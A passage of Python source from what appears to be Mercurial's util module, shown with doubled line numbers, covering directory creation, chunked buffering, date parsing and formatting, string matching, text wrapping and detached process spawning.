1744 1744 return
1745 1745 if err.errno != errno.ENOENT or not name:
1746 1746 raise
1747 1747 parent = os.path.dirname(os.path.abspath(name))
1748 1748 if parent == name:
1749 1749 raise
1750 1750 makedirs(parent, mode, notindexed)
1751 1751 try:
1752 1752 makedir(name, notindexed)
1753 1753 except OSError as err:
1754 1754 # Catch EEXIST to handle races
1755 1755 if err.errno == errno.EEXIST:
1756 1756 return
1757 1757 raise
1758 1758 if mode is not None:
1759 1759 os.chmod(name, mode)
1760 1760
1761 1761 def readfile(path):
1762 1762 with open(path, 'rb') as fp:
1763 1763 return fp.read()
1764 1764
1765 1765 def writefile(path, text):
1766 1766 with open(path, 'wb') as fp:
1767 1767 fp.write(text)
1768 1768
1769 1769 def appendfile(path, text):
1770 1770 with open(path, 'ab') as fp:
1771 1771 fp.write(text)
1772 1772
1773 1773 class chunkbuffer(object):
1774 1774 """Allow arbitrary sized chunks of data to be efficiently read from an
1775 1775 iterator over chunks of arbitrary size."""
1776 1776
1777 1777 def __init__(self, in_iter):
1778 1778 """in_iter is the iterator that's iterating over the input chunks."""
1779 1779 def splitbig(chunks):
1780 1780 for chunk in chunks:
1781 1781 if len(chunk) > 2**20:
1782 1782 pos = 0
1783 1783 while pos < len(chunk):
1784 1784 end = pos + 2 ** 18
1785 1785 yield chunk[pos:end]
1786 1786 pos = end
1787 1787 else:
1788 1788 yield chunk
1789 1789 self.iter = splitbig(in_iter)
1790 1790 self._queue = collections.deque()
1791 1791 self._chunkoffset = 0
1792 1792
1793 1793 def read(self, l=None):
1794 1794 """Read L bytes of data from the iterator of chunks of data.
1795 1795 Returns less than L bytes if the iterator runs dry.
1796 1796
1797 1797 If size parameter is omitted, read everything"""
1798 1798 if l is None:
1799 1799 return ''.join(self.iter)
1800 1800
1801 1801 left = l
1802 1802 buf = []
1803 1803 queue = self._queue
1804 1804 while left > 0:
1805 1805 # refill the queue
1806 1806 if not queue:
1807 1807 target = 2**18
1808 1808 for chunk in self.iter:
1809 1809 queue.append(chunk)
1810 1810 target -= len(chunk)
1811 1811 if target <= 0:
1812 1812 break
1813 1813 if not queue:
1814 1814 break
1815 1815
1816 1816 # The easy way to do this would be to queue.popleft(), modify the
1817 1817 # chunk (if necessary), then queue.appendleft(). However, for cases
1818 1818 # where we read partial chunk content, this incurs 2 dequeue
1819 1819 # mutations and creates a new str for the remaining chunk in the
1820 1820 # queue. Our code below avoids this overhead.
1821 1821
1822 1822 chunk = queue[0]
1823 1823 chunkl = len(chunk)
1824 1824 offset = self._chunkoffset
1825 1825
1826 1826 # Use full chunk.
1827 1827 if offset == 0 and left >= chunkl:
1828 1828 left -= chunkl
1829 1829 queue.popleft()
1830 1830 buf.append(chunk)
1831 1831 # self._chunkoffset remains at 0.
1832 1832 continue
1833 1833
1834 1834 chunkremaining = chunkl - offset
1835 1835
1836 1836 # Use all of unconsumed part of chunk.
1837 1837 if left >= chunkremaining:
1838 1838 left -= chunkremaining
1839 1839 queue.popleft()
1840 1840 # offset == 0 is enabled by block above, so this won't merely
1841 1841 # copy via ``chunk[0:]``.
1842 1842 buf.append(chunk[offset:])
1843 1843 self._chunkoffset = 0
1844 1844
1845 1845 # Partial chunk needed.
1846 1846 else:
1847 1847 buf.append(chunk[offset:offset + left])
1848 1848 self._chunkoffset += left
1849 1849 left -= chunkremaining
1850 1850
1851 1851 return ''.join(buf)
1852 1852
1853 1853 def filechunkiter(f, size=131072, limit=None):
1854 1854 """Create a generator that produces the data in the file size
1855 1855 (default 131072) bytes at a time, up to optional limit (default is
1856 1856 to read all data). Chunks may be less than size bytes if the
1857 1857 chunk is the last chunk in the file, or the file is a socket or
1858 1858 some other type of file that sometimes reads less data than is
1859 1859 requested."""
1860 1860 assert size >= 0
1861 1861 assert limit is None or limit >= 0
1862 1862 while True:
1863 1863 if limit is None:
1864 1864 nbytes = size
1865 1865 else:
1866 1866 nbytes = min(limit, size)
1867 1867 s = nbytes and f.read(nbytes)
1868 1868 if not s:
1869 1869 break
1870 1870 if limit:
1871 1871 limit -= len(s)
1872 1872 yield s
1873 1873
1874 1874 def makedate(timestamp=None):
1875 1875 '''Return a unix timestamp (or the current time) as a (unixtime,
1876 1876 offset) tuple based off the local timezone.'''
1877 1877 if timestamp is None:
1878 1878 timestamp = time.time()
1879 1879 if timestamp < 0:
1880 1880 hint = _("check your clock")
1881 1881 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1882 1882 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1883 1883 datetime.datetime.fromtimestamp(timestamp))
1884 1884 tz = delta.days * 86400 + delta.seconds
1885 1885 return timestamp, tz
1886 1886
1887 1887 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1888 1888 """represent a (unixtime, offset) tuple as a localized time.
1889 1889 unixtime is seconds since the epoch, and offset is the time zone's
1890 1890 number of seconds away from UTC.
1891 1891
1892 1892 >>> datestr((0, 0))
1893 1893 'Thu Jan 01 00:00:00 1970 +0000'
1894 1894 >>> datestr((42, 0))
1895 1895 'Thu Jan 01 00:00:42 1970 +0000'
1896 1896 >>> datestr((-42, 0))
1897 1897 'Wed Dec 31 23:59:18 1969 +0000'
1898 1898 >>> datestr((0x7fffffff, 0))
1899 1899 'Tue Jan 19 03:14:07 2038 +0000'
1900 1900 >>> datestr((-0x80000000, 0))
1901 1901 'Fri Dec 13 20:45:52 1901 +0000'
1902 1902 """
1903 1903 t, tz = date or makedate()
1904 1904 if "%1" in format or "%2" in format or "%z" in format:
1905 1905 sign = (tz > 0) and "-" or "+"
1906 1906 minutes = abs(tz) // 60
1907 1907 q, r = divmod(minutes, 60)
1908 1908 format = format.replace("%z", "%1%2")
1909 1909 format = format.replace("%1", "%c%02d" % (sign, q))
1910 1910 format = format.replace("%2", "%02d" % r)
1911 1911 d = t - tz
1912 1912 if d > 0x7fffffff:
1913 1913 d = 0x7fffffff
1914 1914 elif d < -0x80000000:
1915 1915 d = -0x80000000
1916 1916 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1917 1917 # because they use the gmtime() system call which is buggy on Windows
1918 1918 # for negative values.
1919 1919 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1920 1920 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1921 1921 return s
1922 1922
1923 1923 def shortdate(date=None):
1924 1924 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1925 1925 return datestr(date, format='%Y-%m-%d')
1926 1926
1927 1927 def parsetimezone(s):
1928 1928 """find a trailing timezone, if any, in string, and return a
1929 1929 (offset, remainder) pair"""
1930 1930
1931 1931 if s.endswith("GMT") or s.endswith("UTC"):
1932 1932 return 0, s[:-3].rstrip()
1933 1933
1934 1934 # Unix-style timezones [+-]hhmm
1935 1935 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1936 1936 sign = (s[-5] == "+") and 1 or -1
1937 1937 hours = int(s[-4:-2])
1938 1938 minutes = int(s[-2:])
1939 1939 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1940 1940
1941 1941 # ISO8601 trailing Z
1942 1942 if s.endswith("Z") and s[-2:-1].isdigit():
1943 1943 return 0, s[:-1]
1944 1944
1945 1945 # ISO8601-style [+-]hh:mm
1946 1946 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1947 1947 s[-5:-3].isdigit() and s[-2:].isdigit()):
1948 1948 sign = (s[-6] == "+") and 1 or -1
1949 1949 hours = int(s[-5:-3])
1950 1950 minutes = int(s[-2:])
1951 1951 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1952 1952
1953 1953 return None, s
1954 1954
1955 1955 def strdate(string, format, defaults=None):
1956 1956 """parse a localized time string and return a (unixtime, offset) tuple.
1957 1957 if the string cannot be parsed, ValueError is raised."""
1958 1958 if defaults is None:
1959 1959 defaults = {}
1960 1960
1961 1961 # NOTE: unixtime = localunixtime + offset
1962 1962 offset, date = parsetimezone(string)
1963 1963
1964 1964 # add missing elements from defaults
1965 1965 usenow = False # default to using biased defaults
1966 1966 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1967 1967 part = pycompat.bytestr(part)
1968 1968 found = [True for p in part if ("%"+p) in format]
1969 1969 if not found:
1970 1970 date += "@" + defaults[part][usenow]
1971 1971 format += "@%" + part[0]
1972 1972 else:
1973 1973 # We've found a specific time element, less specific time
1974 1974 # elements are relative to today
1975 1975 usenow = True
1976 1976
1977 1977 timetuple = time.strptime(encoding.strfromlocal(date),
1978 1978 encoding.strfromlocal(format))
1979 1979 localunixtime = int(calendar.timegm(timetuple))
1980 1980 if offset is None:
1981 1981 # local timezone
1982 1982 unixtime = int(time.mktime(timetuple))
1983 1983 offset = unixtime - localunixtime
1984 1984 else:
1985 1985 unixtime = localunixtime + offset
1986 1986 return unixtime, offset
1987 1987
1988 1988 def parsedate(date, formats=None, bias=None):
1989 1989 """parse a localized date/time and return a (unixtime, offset) tuple.
1990 1990
1991 1991 The date may be a "unixtime offset" string or in one of the specified
1992 1992 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1993 1993
1994 1994 >>> parsedate(' today ') == parsedate(\
1995 1995 datetime.date.today().strftime('%b %d'))
1996 1996 True
1997 1997 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1998 1998 datetime.timedelta(days=1)\
1999 1999 ).strftime('%b %d'))
2000 2000 True
2001 2001 >>> now, tz = makedate()
2002 2002 >>> strnow, strtz = parsedate('now')
2003 2003 >>> (strnow - now) < 1
2004 2004 True
2005 2005 >>> tz == strtz
2006 2006 True
2007 2007 """
2008 2008 if bias is None:
2009 2009 bias = {}
2010 2010 if not date:
2011 2011 return 0, 0
2012 2012 if isinstance(date, tuple) and len(date) == 2:
2013 2013 return date
2014 2014 if not formats:
2015 2015 formats = defaultdateformats
2016 2016 date = date.strip()
2017 2017
2018 2018 if date == 'now' or date == _('now'):
2019 2019 return makedate()
2020 2020 if date == 'today' or date == _('today'):
2021 2021 date = datetime.date.today().strftime('%b %d')
2022 2022 elif date == 'yesterday' or date == _('yesterday'):
2023 2023 date = (datetime.date.today() -
2024 2024 datetime.timedelta(days=1)).strftime('%b %d')
2025 2025
2026 2026 try:
2027 2027 when, offset = map(int, date.split(' '))
2028 2028 except ValueError:
2029 2029 # fill out defaults
2030 2030 now = makedate()
2031 2031 defaults = {}
2032 2032 for part in ("d", "mb", "yY", "HI", "M", "S"):
2033 2033 # this piece is for rounding the specific end of unknowns
2034 2034 b = bias.get(part)
2035 2035 if b is None:
2036 2036 if part[0:1] in "HMS":
2037 2037 b = "00"
2038 2038 else:
2039 2039 b = "0"
2040 2040
2041 2041 # this piece is for matching the generic end to today's date
2042 2042 n = datestr(now, "%" + part[0:1])
2043 2043
2044 2044 defaults[part] = (b, n)
2045 2045
2046 2046 for format in formats:
2047 2047 try:
2048 2048 when, offset = strdate(date, format, defaults)
2049 2049 except (ValueError, OverflowError):
2050 2050 pass
2051 2051 else:
2052 2052 break
2053 2053 else:
2054 2054 raise error.ParseError(_('invalid date: %r') % date)
2055 2055 # validate explicit (probably user-specified) date and
2056 2056 # time zone offset. values must fit in signed 32 bits for
2057 2057 # current 32-bit linux runtimes. timezones go from UTC-12
2058 2058 # to UTC+14
2059 2059 if when < -0x80000000 or when > 0x7fffffff:
2060 2060 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2061 2061 if offset < -50400 or offset > 43200:
2062 2062 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2063 2063 return when, offset
2064 2064
2065 2065 def matchdate(date):
2066 2066 """Return a function that matches a given date match specifier
2067 2067
2068 2068 Formats include:
2069 2069
2070 2070 '{date}' match a given date to the accuracy provided
2071 2071
2072 2072 '<{date}' on or before a given date
2073 2073
2074 2074 '>{date}' on or after a given date
2075 2075
2076 2076 >>> p1 = parsedate("10:29:59")
2077 2077 >>> p2 = parsedate("10:30:00")
2078 2078 >>> p3 = parsedate("10:30:59")
2079 2079 >>> p4 = parsedate("10:31:00")
2080 2080 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2081 2081 >>> f = matchdate("10:30")
2082 2082 >>> f(p1[0])
2083 2083 False
2084 2084 >>> f(p2[0])
2085 2085 True
2086 2086 >>> f(p3[0])
2087 2087 True
2088 2088 >>> f(p4[0])
2089 2089 False
2090 2090 >>> f(p5[0])
2091 2091 False
2092 2092 """
2093 2093
2094 2094 def lower(date):
2095 2095 d = {'mb': "1", 'd': "1"}
2096 2096 return parsedate(date, extendeddateformats, d)[0]
2097 2097
2098 2098 def upper(date):
2099 2099 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2100 2100 for days in ("31", "30", "29"):
2101 2101 try:
2102 2102 d["d"] = days
2103 2103 return parsedate(date, extendeddateformats, d)[0]
2104 2104 except Abort:
2105 2105 pass
2106 2106 d["d"] = "28"
2107 2107 return parsedate(date, extendeddateformats, d)[0]
2108 2108
2109 2109 date = date.strip()
2110 2110
2111 2111 if not date:
2112 2112 raise Abort(_("dates cannot consist entirely of whitespace"))
2113 2113 elif date[0] == "<":
2114 2114 if not date[1:]:
2115 2115 raise Abort(_("invalid day spec, use '<DATE'"))
2116 2116 when = upper(date[1:])
2117 2117 return lambda x: x <= when
2118 2118 elif date[0] == ">":
2119 2119 if not date[1:]:
2120 2120 raise Abort(_("invalid day spec, use '>DATE'"))
2121 2121 when = lower(date[1:])
2122 2122 return lambda x: x >= when
2123 2123 elif date[0] == "-":
2124 2124 try:
2125 2125 days = int(date[1:])
2126 2126 except ValueError:
2127 2127 raise Abort(_("invalid day spec: %s") % date[1:])
2128 2128 if days < 0:
2129 2129 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2130 2130 % date[1:])
2131 2131 when = makedate()[0] - days * 3600 * 24
2132 2132 return lambda x: x >= when
2133 2133 elif " to " in date:
2134 2134 a, b = date.split(" to ")
2135 2135 start, stop = lower(a), upper(b)
2136 2136 return lambda x: x >= start and x <= stop
2137 2137 else:
2138 2138 start, stop = lower(date), upper(date)
2139 2139 return lambda x: x >= start and x <= stop
2140 2140
2141 2141 def stringmatcher(pattern, casesensitive=True):
2142 2142 """
2143 2143 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2144 2144 returns the matcher name, pattern, and matcher function.
2145 2145 missing or unknown prefixes are treated as literal matches.
2146 2146
2147 2147 helper for tests:
2148 2148 >>> def test(pattern, *tests):
2149 2149 ... kind, pattern, matcher = stringmatcher(pattern)
2150 2150 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2151 2151 >>> def itest(pattern, *tests):
2152 2152 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2153 2153 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2154 2154
2155 2155 exact matching (no prefix):
2156 2156 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2157 2157 ('literal', 'abcdefg', [False, False, True])
2158 2158
2159 2159 regex matching ('re:' prefix)
2160 2160 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2161 2161 ('re', 'a.+b', [False, False, True])
2162 2162
2163 2163 force exact matches ('literal:' prefix)
2164 2164 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2165 2165 ('literal', 're:foobar', [False, True])
2166 2166
2167 2167 unknown prefixes are ignored and treated as literals
2168 2168 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2169 2169 ('literal', 'foo:bar', [False, False, True])
2170 2170
2171 2171 case insensitive regex matches
2172 2172 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2173 2173 ('re', 'A.+b', [False, False, True])
2174 2174
2175 2175 case insensitive literal matches
2176 2176 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2177 2177 ('literal', 'ABCDEFG', [False, False, True])
2178 2178 """
2179 2179 if pattern.startswith('re:'):
2180 2180 pattern = pattern[3:]
2181 2181 try:
2182 2182 flags = 0
2183 2183 if not casesensitive:
2184 2184 flags = remod.I
2185 2185 regex = remod.compile(pattern, flags)
2186 2186 except remod.error as e:
2187 2187 raise error.ParseError(_('invalid regular expression: %s')
2188 2188 % e)
2189 2189 return 're', pattern, regex.search
2190 2190 elif pattern.startswith('literal:'):
2191 2191 pattern = pattern[8:]
2192 2192
2193 2193 match = pattern.__eq__
2194 2194
2195 2195 if not casesensitive:
2196 2196 ipat = encoding.lower(pattern)
2197 2197 match = lambda s: ipat == encoding.lower(s)
2198 2198 return 'literal', pattern, match
2199 2199
2200 2200 def shortuser(user):
2201 2201 """Return a short representation of a user name or email address."""
2202 2202 f = user.find('@')
2203 2203 if f >= 0:
2204 2204 user = user[:f]
2205 2205 f = user.find('<')
2206 2206 if f >= 0:
2207 2207 user = user[f + 1:]
2208 2208 f = user.find(' ')
2209 2209 if f >= 0:
2210 2210 user = user[:f]
2211 2211 f = user.find('.')
2212 2212 if f >= 0:
2213 2213 user = user[:f]
2214 2214 return user
2215 2215
2216 2216 def emailuser(user):
2217 2217 """Return the user portion of an email address."""
2218 2218 f = user.find('@')
2219 2219 if f >= 0:
2220 2220 user = user[:f]
2221 2221 f = user.find('<')
2222 2222 if f >= 0:
2223 2223 user = user[f + 1:]
2224 2224 return user
2225 2225
2226 2226 def email(author):
2227 2227 '''get email of author.'''
2228 2228 r = author.find('>')
2229 2229 if r == -1:
2230 2230 r = None
2231 2231 return author[author.find('<') + 1:r]
2232 2232
2233 2233 def ellipsis(text, maxlength=400):
2234 2234 """Trim string to at most maxlength (default: 400) columns in display."""
2235 2235 return encoding.trim(text, maxlength, ellipsis='...')
2236 2236
2237 2237 def unitcountfn(*unittable):
2238 2238 '''return a function that renders a readable count of some quantity'''
2239 2239
2240 2240 def go(count):
2241 2241 for multiplier, divisor, format in unittable:
2242 2242 if abs(count) >= divisor * multiplier:
2243 2243 return format % (count / float(divisor))
2244 2244 return unittable[-1][2] % count
2245 2245
2246 2246 return go
2247 2247
2248 2248 def processlinerange(fromline, toline):
2249 2249 """Check that linerange <fromline>:<toline> makes sense and return a
2250 2250 0-based range.
2251 2251
2252 2252 >>> processlinerange(10, 20)
2253 2253 (9, 20)
2254 2254 >>> processlinerange(2, 1)
2255 2255 Traceback (most recent call last):
2256 2256 ...
2257 2257 ParseError: line range must be positive
2258 2258 >>> processlinerange(0, 5)
2259 2259 Traceback (most recent call last):
2260 2260 ...
2261 2261 ParseError: fromline must be strictly positive
2262 2262 """
2263 2263 if toline - fromline < 0:
2264 2264 raise error.ParseError(_("line range must be positive"))
2265 2265 if fromline < 1:
2266 2266 raise error.ParseError(_("fromline must be strictly positive"))
2267 2267 return fromline - 1, toline
2268 2268
2269 2269 bytecount = unitcountfn(
2270 2270 (100, 1 << 30, _('%.0f GB')),
2271 2271 (10, 1 << 30, _('%.1f GB')),
2272 2272 (1, 1 << 30, _('%.2f GB')),
2273 2273 (100, 1 << 20, _('%.0f MB')),
2274 2274 (10, 1 << 20, _('%.1f MB')),
2275 2275 (1, 1 << 20, _('%.2f MB')),
2276 2276 (100, 1 << 10, _('%.0f KB')),
2277 2277 (10, 1 << 10, _('%.1f KB')),
2278 2278 (1, 1 << 10, _('%.2f KB')),
2279 2279 (1, 1, _('%.0f bytes')),
2280 2280 )
2281 2281
2282 2282 # Matches a single EOL which can either be a CRLF where repeated CR
2283 2283 # are removed or a LF. We do not care about old Macintosh files, so a
2284 2284 # stray CR is an error.
2285 2285 _eolre = remod.compile(br'\r*\n')
2286 2286
2287 2287 def tolf(s):
2288 2288 return _eolre.sub('\n', s)
2289 2289
2290 2290 def tocrlf(s):
2291 2291 return _eolre.sub('\r\n', s)
2292 2292
2293 2293 if pycompat.oslinesep == '\r\n':
2294 2294 tonativeeol = tocrlf
2295 2295 fromnativeeol = tolf
2296 2296 else:
2297 2297 tonativeeol = pycompat.identity
2298 2298 fromnativeeol = pycompat.identity
2299 2299
2300 2300 def escapestr(s):
2301 2301 # call underlying function of s.encode('string_escape') directly for
2302 2302 # Python 3 compatibility
2303 2303 return codecs.escape_encode(s)[0]
2304 2304
2305 2305 def unescapestr(s):
2306 2306 return codecs.escape_decode(s)[0]
2307 2307
2308 2308 def forcebytestr(obj):
2309 2309 """Portably format an arbitrary object (e.g. exception) into a byte
2310 2310 string."""
2311 2311 try:
2312 2312 return pycompat.bytestr(obj)
2313 2313 except UnicodeEncodeError:
2314 2314 # non-ascii string, may be lossy
2315 2315 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2316 2316
2317 2317 def uirepr(s):
2318 2318 # Avoid double backslash in Windows path repr()
2319 2319 return repr(s).replace('\\\\', '\\')
2320 2320
2321 2321 # delay import of textwrap
2322 2322 def MBTextWrapper(**kwargs):
2323 2323 class tw(textwrap.TextWrapper):
2324 2324 """
2325 2325 Extend TextWrapper for width-awareness.
2326 2326
2327 2327 Neither number of 'bytes' in any encoding nor 'characters' is
2328 2328 appropriate to calculate terminal columns for specified string.
2329 2329
2330 2330 Original TextWrapper implementation uses built-in 'len()' directly,
2331 2331 so overriding is needed to use width information of each characters.
2332 2332
2333 2333 In addition, characters classified into 'ambiguous' width are
2334 2334 treated as wide in East Asian area, but as narrow in other.
2335 2335
2336 2336 This requires use decision to determine width of such characters.
2337 2337 """
2338 2338 def _cutdown(self, ucstr, space_left):
2339 2339 l = 0
2340 2340 colwidth = encoding.ucolwidth
2341 2341 for i in xrange(len(ucstr)):
2342 2342 l += colwidth(ucstr[i])
2343 2343 if space_left < l:
2344 2344 return (ucstr[:i], ucstr[i:])
2345 2345 return ucstr, ''
2346 2346
2347 2347 # overriding of base class
2348 2348 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2349 2349 space_left = max(width - cur_len, 1)
2350 2350
2351 2351 if self.break_long_words:
2352 2352 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2353 2353 cur_line.append(cut)
2354 2354 reversed_chunks[-1] = res
2355 2355 elif not cur_line:
2356 2356 cur_line.append(reversed_chunks.pop())
2357 2357
2358 2358 # this overriding code is imported from TextWrapper of Python 2.6
2359 2359 # to calculate columns of string by 'encoding.ucolwidth()'
2360 2360 def _wrap_chunks(self, chunks):
2361 2361 colwidth = encoding.ucolwidth
2362 2362
2363 2363 lines = []
2364 2364 if self.width <= 0:
2365 2365 raise ValueError("invalid width %r (must be > 0)" % self.width)
2366 2366
2367 2367 # Arrange in reverse order so items can be efficiently popped
2368 2368 # from a stack of chucks.
2369 2369 chunks.reverse()
2370 2370
2371 2371 while chunks:
2372 2372
2373 2373 # Start the list of chunks that will make up the current line.
2374 2374 # cur_len is just the length of all the chunks in cur_line.
2375 2375 cur_line = []
2376 2376 cur_len = 0
2377 2377
2378 2378 # Figure out which static string will prefix this line.
2379 2379 if lines:
2380 2380 indent = self.subsequent_indent
2381 2381 else:
2382 2382 indent = self.initial_indent
2383 2383
2384 2384 # Maximum width for this line.
2385 2385 width = self.width - len(indent)
2386 2386
2387 2387 # First chunk on line is whitespace -- drop it, unless this
2388 2388 # is the very beginning of the text (i.e. no lines started yet).
2389 2389 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2390 2390 del chunks[-1]
2391 2391
2392 2392 while chunks:
2393 2393 l = colwidth(chunks[-1])
2394 2394
2395 2395 # Can at least squeeze this chunk onto the current line.
2396 2396 if cur_len + l <= width:
2397 2397 cur_line.append(chunks.pop())
2398 2398 cur_len += l
2399 2399
2400 2400 # Nope, this line is full.
2401 2401 else:
2402 2402 break
2403 2403
2404 2404 # The current line is full, and the next chunk is too big to
2405 2405 # fit on *any* line (not just this one).
2406 2406 if chunks and colwidth(chunks[-1]) > width:
2407 2407 self._handle_long_word(chunks, cur_line, cur_len, width)
2408 2408
2409 2409 # If the last chunk on this line is all whitespace, drop it.
2410 2410 if (self.drop_whitespace and
2411 2411 cur_line and cur_line[-1].strip() == r''):
2412 2412 del cur_line[-1]
2413 2413
2414 2414 # Convert current line back to a string and store it in list
2415 2415 # of all lines (return value).
2416 2416 if cur_line:
2417 2417 lines.append(indent + r''.join(cur_line))
2418 2418
2419 2419 return lines
2420 2420
2421 2421 global MBTextWrapper
2422 2422 MBTextWrapper = tw
2423 2423 return tw(**kwargs)
2424 2424
2425 2425 def wrap(line, width, initindent='', hangindent=''):
2426 2426 maxindent = max(len(hangindent), len(initindent))
2427 2427 if width <= maxindent:
2428 2428 # adjust for weird terminal size
2429 2429 width = max(78, maxindent + 1)
2430 2430 line = line.decode(pycompat.sysstr(encoding.encoding),
2431 2431 pycompat.sysstr(encoding.encodingmode))
2432 2432 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2433 2433 pycompat.sysstr(encoding.encodingmode))
2434 2434 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2435 2435 pycompat.sysstr(encoding.encodingmode))
2436 2436 wrapper = MBTextWrapper(width=width,
2437 2437 initial_indent=initindent,
2438 2438 subsequent_indent=hangindent)
2439 2439 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2440 2440
2441 2441 if (pyplatform.python_implementation() == 'CPython' and
2442 2442 sys.version_info < (3, 0)):
2443 2443 # There is an issue in CPython that some IO methods do not handle EINTR
2444 2444 # correctly. The following table shows what CPython version (and functions)
2445 2445 # are affected (buggy: has the EINTR bug, okay: otherwise):
2446 2446 #
2447 2447 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2448 2448 # --------------------------------------------------
2449 2449 # fp.__iter__ | buggy | buggy | okay
2450 2450 # fp.read* | buggy | okay [1] | okay
2451 2451 #
2452 2452 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2453 2453 #
2454 2454 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2455 2455 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2456 2456 #
2457 2457 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2458 2458 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2459 2459 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2460 2460 # fp.__iter__ but not other fp.read* methods.
2461 2461 #
2462 2462 # On modern systems like Linux, the "read" syscall cannot be interrupted
2463 2463 # when reading "fast" files like on-disk files. So the EINTR issue only
2464 2464 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2465 2465 # files approximately as "fast" files and use the fast (unsafe) code path,
2466 2466 # to minimize the performance impact.
2467 2467 if sys.version_info >= (2, 7, 4):
2468 2468 # fp.readline deals with EINTR correctly, use it as a workaround.
2469 2469 def _safeiterfile(fp):
2470 2470 return iter(fp.readline, '')
2471 2471 else:
2472 2472 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2473 2473 # note: this may block longer than necessary because of bufsize.
2474 2474 def _safeiterfile(fp, bufsize=4096):
2475 2475 fd = fp.fileno()
2476 2476 line = ''
2477 2477 while True:
2478 2478 try:
2479 2479 buf = os.read(fd, bufsize)
2480 2480 except OSError as ex:
2481 2481 # os.read only raises EINTR before any data is read
2482 2482 if ex.errno == errno.EINTR:
2483 2483 continue
2484 2484 else:
2485 2485 raise
2486 2486 line += buf
2487 2487 if '\n' in buf:
2488 2488 splitted = line.splitlines(True)
2489 2489 line = ''
2490 2490 for l in splitted:
2491 2491 if l[-1] == '\n':
2492 2492 yield l
2493 2493 else:
2494 2494 line = l
2495 2495 if not buf:
2496 2496 break
2497 2497 if line:
2498 2498 yield line
2499 2499
2500 2500 def iterfile(fp):
2501 2501 fastpath = True
2502 2502 if type(fp) is file:
2503 2503 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2504 2504 if fastpath:
2505 2505 return fp
2506 2506 else:
2507 2507 return _safeiterfile(fp)
2508 2508 else:
2509 2509 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2510 2510 def iterfile(fp):
2511 2511 return fp
2512 2512
2513 2513 def iterlines(iterator):
2514 2514 for chunk in iterator:
2515 2515 for line in chunk.splitlines():
2516 2516 yield line
2517 2517
2518 2518 def expandpath(path):
2519 2519 return os.path.expanduser(os.path.expandvars(path))
2520 2520
2521 2521 def hgcmd():
2522 2522 """Return the command used to execute current hg
2523 2523
2524 2524 This is different from hgexecutable() because on Windows we want
2525 2525 to avoid things opening new shell windows like batch files, so we
2526 2526 get either the python call or current executable.
2527 2527 """
2528 2528 if mainfrozen():
2529 2529 if getattr(sys, 'frozen', None) == 'macosx_app':
2530 2530 # Env variable set by py2app
2531 2531 return [encoding.environ['EXECUTABLEPATH']]
2532 2532 else:
2533 2533 return [pycompat.sysexecutable]
2534 2534 return gethgcmd()
2535 2535
2536 2536 def rundetached(args, condfn):
2537 2537 """Execute the argument list in a detached process.
2538 2538
2539 2539 condfn is a callable which is called repeatedly and should return
2540 2540 True once the child process is known to have started successfully.
2541 2541 At this point, the child process PID is returned. If the child
2542 2542 process fails to start or finishes before condfn() evaluates to
2543 2543 True, return -1.
2544 2544 """
2545 2545 # Windows case is easier because the child process is either
2546 2546 # successfully starting and validating the condition or exiting
2547 2547 # on failure. We just poll on its PID. On Unix, if the child
2548 2548 # process fails to start, it will be left in a zombie state until
2549 2549 # the parent wait on it, which we cannot do since we expect a long
2550 2550 # running process on success. Instead we listen for SIGCHLD telling
2551 2551 # us our child process terminated.
2552 2552 terminated = set()
2553 2553 def handler(signum, frame):
2554 2554 terminated.add(os.wait())
2555 2555 prevhandler = None
2556 2556 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2557 2557 if SIGCHLD is not None:
2558 2558 prevhandler = signal.signal(SIGCHLD, handler)
2559 2559 try:
2560 2560 pid = spawndetached(args)
2561 2561 while not condfn():
2562 2562 if ((pid in terminated or not testpid(pid))
2563 2563 and not condfn()):
2564 2564 return -1
2565 2565 time.sleep(0.1)
2566 2566 return pid
2567 2567 finally:
2568 2568 if prevhandler is not None:
